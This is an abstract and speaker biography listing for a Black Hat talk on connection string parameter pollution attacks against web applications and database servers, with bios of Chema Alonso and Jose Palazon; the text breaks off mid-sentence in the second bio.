Connnection String Parameter Pollution Attacks presented at Blackhat DC 2006

by Chema Alonso, Jose ( Palako ) Palazon (Yahoo),

Summary : This session is about Parameter Pollution in Connection Strings Attacks. Today, a lot of tools and web applications allow users to configure dynamically a connection against a Database server. This session will demonstrate the high risk in doing this insecurely. This session will show how to steal, in Microsoft Internet Information Services, the user account credentials, how to get access to this web applications impersonating the connection and taking advantage of the web server credentials and how to connect against internal database servers in the DMZ without credentials. The impact of these techniques are specialy dangerous in hosting companies which allow customers to connect against control panels to configure databases.

Chema Alonso: Chema Alonso is a Computer Engineer by the Rey Juan Carlos University and System Engineer by the Politecnica University of Madrid. He has been working as security consultant last six years and had been awarded as Microsoft Most Valuable Professional since 2005 to present time. He is a Microsoft frequent speaker in Security Conferences. He writes monthly in several Spanish Technical Magazines. He is currently working on his PhD thesis about Blind Techniques. Recently spoke in BH Europe 2008 about LDAP Injection & Blind LDAP Injection attacks, in Defcon 16 about Time-Based Blind SQL Injection using heavy Queries, in Toorcon X about RFD (Remote File Downloading) and in DeepSec 2k8 in Austria. Currently has been selected to be presenting in HackCon#4 in Norway and in SchmooCon 2k9 in Washington DC, BlackHat Europe 2k9 and Defcon 17.

Jose ( Palako ) Palazon: Jose Palazon: (palako) is globally responsible for mobile security at Yahoo!. With more than 9 years experience in security auditing, consulting and trainning for the public, private and academic sectors, his areas of expertise include mobile, web security, unix systems security and digital forensics. Frequent international speaker, he has presented, among others, at DEFCON (Las Vegas), Shmoocon (Washington) and FOWA (London), as well as published vulnerabilities in key sites such as